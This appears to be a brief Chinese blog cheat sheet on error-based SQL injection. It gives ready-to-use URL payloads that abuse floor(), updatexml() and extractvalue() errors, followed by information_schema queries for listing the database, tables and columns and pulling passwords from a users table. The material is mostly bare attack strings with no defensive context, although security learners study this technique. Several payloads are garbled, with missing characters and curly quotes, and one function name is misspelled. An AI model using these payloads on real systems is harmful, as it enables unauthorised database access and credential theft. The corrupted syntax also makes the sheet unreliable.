sql注入

sql报错注入

1.报错函数

(1).floor()报错

语句:

?id=1‘ union select 1,count(),concat(payload,floor(rand(0)2))x from information_schema.columns group by x --+

(2).updatexml()报错

语句:

?id=1%27 and updatexml(1,concat(0x26,payload,0x26),1);---+

(3).exvalue()报错

?id=1′ and extractvalue(1,concat(0x26,database(),0x26));--+

  • 注:这些函数都只能爆出32位字符

2.查询payload

1.查数据库:database()

2.查表(要加括号):select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1

3.列:select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1

4.字段:select password from users limit 0,1

 

 

sql注入

上一篇:SpringBoot整合Swagger2及使用


下一篇:oracle11gR2 静默安装及建库赋权